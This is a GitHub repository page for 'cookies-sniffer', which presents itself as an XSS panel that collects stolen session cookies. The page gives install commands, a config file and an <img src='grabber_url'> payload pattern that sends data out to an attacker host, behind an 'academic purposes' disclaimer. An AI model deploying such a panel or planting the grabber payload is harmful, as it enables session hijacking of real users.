Inplex-sys / cookies-sniffer

This app is an advanced XSS panel, this is used for session grabbing with XSS exploit and <img src="grabber_url">

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Cookies-sniffer

Features!

  • Simple data saving (JSON)
  • Modulable
  • Securized login system
  • WEB & CLI logs saving
  • Linux and windows usable

How it work ?

alt text

Installation

Install the app on the server

user@domain:~# git clone https://github.com/inplex-sys/cookies-sniffer.git
user@domain:~# cd ./cookies-sniffer/
user@domain:~# npm install
user@domain:~# node app.js

Edit credentials in config.json

{
  "credentials":{
    "auth_key":"put-your-password"
  },
  "logs":[]
}

Disclamer

This repository is for academic purposes, the use of this software is your responsibility.

About

This app is an advanced XSS panel, this is used for session grabbing with XSS exploit and <img src="grabber_url">


Languages

Language:JavaScript 86.5%Language:EJS 8.9%Language:CSS 4.6%